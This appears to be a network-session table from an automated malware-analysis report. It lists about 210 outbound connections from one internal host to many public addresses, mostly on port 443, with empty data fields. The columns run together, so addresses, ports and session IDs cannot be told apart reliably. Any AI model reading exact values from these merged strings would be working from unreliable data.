                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14793192.168.2.1440344172.120.157.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14794192.168.2.14360201.106.53.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14795192.168.2.145081641.129.230.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14796192.168.2.145463268.135.231.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14797192.168.2.1454664180.240.0.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14798192.168.2.1453194211.128.255.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14799192.168.2.1436208212.18.122.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14800192.168.2.1454496192.82.56.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14801192.168.2.1437672174.223.220.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14802192.168.2.144975484.126.59.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14803192.168.2.1450694213.92.119.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14804192.168.2.1451082199.107.110.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14805192.168.2.1452194175.174.148.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14806192.168.2.1443920148.41.244.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14807192.168.2.143433424.108.4.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14808192.168.2.1447492184.212.3.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14809192.168.2.1435410105.111.185.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14810192.168.2.144565218.110.166.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14811192.168.2.1435396181.201.65.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14812192.168.2.1449956186.224.30.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14813192.168.2.1438330125.185.155.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14814192.168.2.1445832147.215.180.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14815192.168.2.145911290.228.46.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14816192.168.2.1442098115.228.33.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14817192.168.2.143920451.242.92.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14818192.168.2.1453188147.161.139.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14819192.168.2.1454932201.238.18.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14820192.168.2.145546472.199.26.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14821192.168.2.1447380194.109.128.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14822192.168.2.145555864.5.186.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14823192.168.2.1451960152.190.242.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14824192.168.2.1458626118.114.98.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14825192.168.2.1442380132.108.172.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14826192.168.2.1438880197.118.86.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14827192.168.2.144571889.159.135.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14828192.168.2.1436038165.50.58.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14829192.168.2.144972299.55.99.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14830192.168.2.145481651.164.253.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14831192.168.2.143993069.4.250.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14832192.168.2.1453746118.155.146.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14833192.168.2.1455130158.8.194.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14834192.168.2.1439368168.46.235.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14835192.168.2.1435542104.101.151.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14836192.168.2.144669696.79.211.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14837192.168.2.1459266203.202.227.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14838192.168.2.1459960152.169.179.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14839192.168.2.1439876128.24.30.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14840192.168.2.1432828118.242.139.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14841192.168.2.1440722130.123.227.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14842192.168.2.1450406207.115.235.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14843192.168.2.144693872.243.86.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14844192.168.2.143287676.137.61.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14845192.168.2.1437006160.131.162.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14846192.168.2.1445800194.151.27.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14847192.168.2.1444530187.252.240.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14848192.168.2.1438298121.194.95.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14849192.168.2.145212053.176.38.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14850192.168.2.1443014198.15.254.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14851192.168.2.1441728112.226.23.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14852192.168.2.1451474193.123.17.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14853192.168.2.146011431.186.164.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14854192.168.2.1432862146.194.217.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14855192.168.2.145622831.202.30.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14856192.168.2.1445210221.114.229.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14857192.168.2.1456356101.123.40.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14858192.168.2.1436336172.137.236.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14859192.168.2.14394749.241.236.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14860192.168.2.143694881.51.24.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14861192.168.2.1446768189.103.144.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14862192.168.2.1435952149.249.97.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14863192.168.2.145250419.9.6.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14864192.168.2.1433696210.44.204.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14865192.168.2.1448614183.249.112.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14866192.168.2.145540231.27.23.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14867192.168.2.146005250.1.150.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14868192.168.2.145917823.145.73.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14869192.168.2.1444736169.251.54.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14870192.168.2.145687486.144.103.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14871192.168.2.1454952149.224.112.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14872192.168.2.143605674.29.82.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14873192.168.2.1447510113.83.244.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14874192.168.2.1439560134.142.159.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14875192.168.2.1435360167.25.160.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14876192.168.2.1457542150.25.229.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14877192.168.2.143355689.54.183.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14878192.168.2.1448296135.51.129.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14879192.168.2.1458012168.205.76.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14880192.168.2.145594669.182.21.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14881192.168.2.145259058.164.19.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14882192.168.2.1436200213.137.62.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14883192.168.2.1439714199.254.9.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14884192.168.2.1434080186.217.38.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14885192.168.2.1454808110.203.100.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14886192.168.2.1447946111.171.201.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14887192.168.2.144209285.209.5.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14888192.168.2.1439744182.209.138.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14889192.168.2.1433860132.69.242.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14890192.168.2.145088035.17.85.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14891192.168.2.143319836.144.226.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14892192.168.2.1434496221.162.144.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14893192.168.2.14467364.227.6.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14894192.168.2.1458034189.6.139.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14895192.168.2.1460698109.57.76.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14896192.168.2.146026050.76.238.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14897192.168.2.144598274.118.19.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14898192.168.2.1457508138.140.241.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14899192.168.2.1441260132.248.181.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14900192.168.2.144845065.67.66.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14901192.168.2.1433796146.17.109.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14902192.168.2.1443388200.186.125.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14903192.168.2.1455696166.97.234.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14904192.168.2.1445172131.97.102.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14905192.168.2.1452814167.133.139.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14906192.168.2.144750042.31.4.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14907192.168.2.1459004175.26.251.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14908192.168.2.1455904210.246.226.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14909192.168.2.1449984120.102.138.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14910192.168.2.1442428216.146.203.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14911192.168.2.1458768172.199.3.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14912192.168.2.1443088130.90.178.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14913192.168.2.1455484204.98.233.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14914192.168.2.1451074176.93.3.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14915192.168.2.1453770167.59.35.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14916192.168.2.1456240181.147.57.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14917192.168.2.143990499.139.248.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14918192.168.2.1455684114.247.164.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14919192.168.2.1458990110.153.70.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14920192.168.2.144230640.53.28.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14921192.168.2.145749894.96.160.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14922192.168.2.1454432160.199.80.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14923192.168.2.145502667.149.160.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14924192.168.2.145339262.24.133.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14925192.168.2.1457884128.253.70.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14926192.168.2.1457394106.41.182.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14927192.168.2.145739276.69.174.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14928192.168.2.1449156106.35.245.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14929192.168.2.1435666207.201.232.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14930192.168.2.1448500134.21.46.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14931192.168.2.145136299.124.66.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14932192.168.2.144962423.118.113.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14933192.168.2.1433742108.39.243.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14934192.168.2.1460882206.161.124.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14935192.168.2.1445294213.218.108.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14936192.168.2.1457014186.231.75.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14937192.168.2.144294820.151.105.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14938192.168.2.144914679.183.145.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14939192.168.2.144304012.109.111.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14940192.168.2.144991018.86.17.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14941192.168.2.144563669.26.50.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14942192.168.2.1439178192.54.77.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14943192.168.2.1446004132.165.20.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14944192.168.2.1449550201.157.95.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14945192.168.2.146050699.152.171.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14946192.168.2.144074020.75.135.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14947192.168.2.1457504163.52.191.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14948192.168.2.145958292.31.43.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14949192.168.2.144899217.6.177.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14950192.168.2.1456760218.162.229.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14951192.168.2.1459236165.248.196.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14952192.168.2.1447644204.16.86.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14953192.168.2.1443266126.77.21.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14954192.168.2.1459524138.94.129.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14955192.168.2.1446990181.226.74.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14956192.168.2.1460140183.250.182.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14957192.168.2.1439710143.68.222.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14958192.168.2.143606277.86.26.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14959192.168.2.1460834143.40.23.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14960192.168.2.144689020.44.55.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14961192.168.2.1449998167.229.67.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14962192.168.2.1433632196.103.4.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14963192.168.2.144013269.226.202.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14964192.168.2.143707053.26.6.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14965192.168.2.1443372211.247.42.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14966192.168.2.144951654.23.99.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14967192.168.2.1453532104.72.77.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14968192.168.2.14358089.67.237.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14969192.168.2.1437026171.170.44.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14970192.168.2.1451750109.56.182.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14971192.168.2.1451584217.242.55.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14972192.168.2.1441020124.151.188.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14973192.168.2.145825036.171.214.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14974192.168.2.144723685.44.21.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14975192.168.2.1449312137.221.144.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14976192.168.2.144991090.213.18.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14977192.168.2.1439630199.171.88.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14978192.168.2.145518477.253.205.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14979192.168.2.145937465.120.35.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14980192.168.2.144454686.186.82.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14981192.168.2.1446002168.186.132.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14982192.168.2.144896257.99.127.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14983192.168.2.145773019.126.251.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14984192.168.2.1441688114.113.78.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14985192.168.2.1438512111.100.161.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14986192.168.2.14560068.178.84.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14987192.168.2.1440348157.103.119.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14988192.168.2.1452608157.234.248.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14989192.168.2.1447418129.90.35.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14990192.168.2.1442756175.129.131.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14991192.168.2.14368745.22.83.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14992192.168.2.144408663.199.49.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14993192.168.2.1455432222.152.253.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14994192.168.2.1451326183.73.104.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14995192.168.2.146032280.29.218.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14996192.168.2.1447334170.241.129.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14997192.168.2.1441686154.188.123.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14998192.168.2.1440024155.205.46.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14999192.168.2.1435586129.166.250.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15000192.168.2.1435216104.19.44.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15001192.168.2.144764824.137.145.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15002192.168.2.1453472183.187.230.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15003192.168.2.1440958116.50.88.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15004192.168.2.1448082124.229.47.75443
                                                        TimestampBytes transferredDirectionData


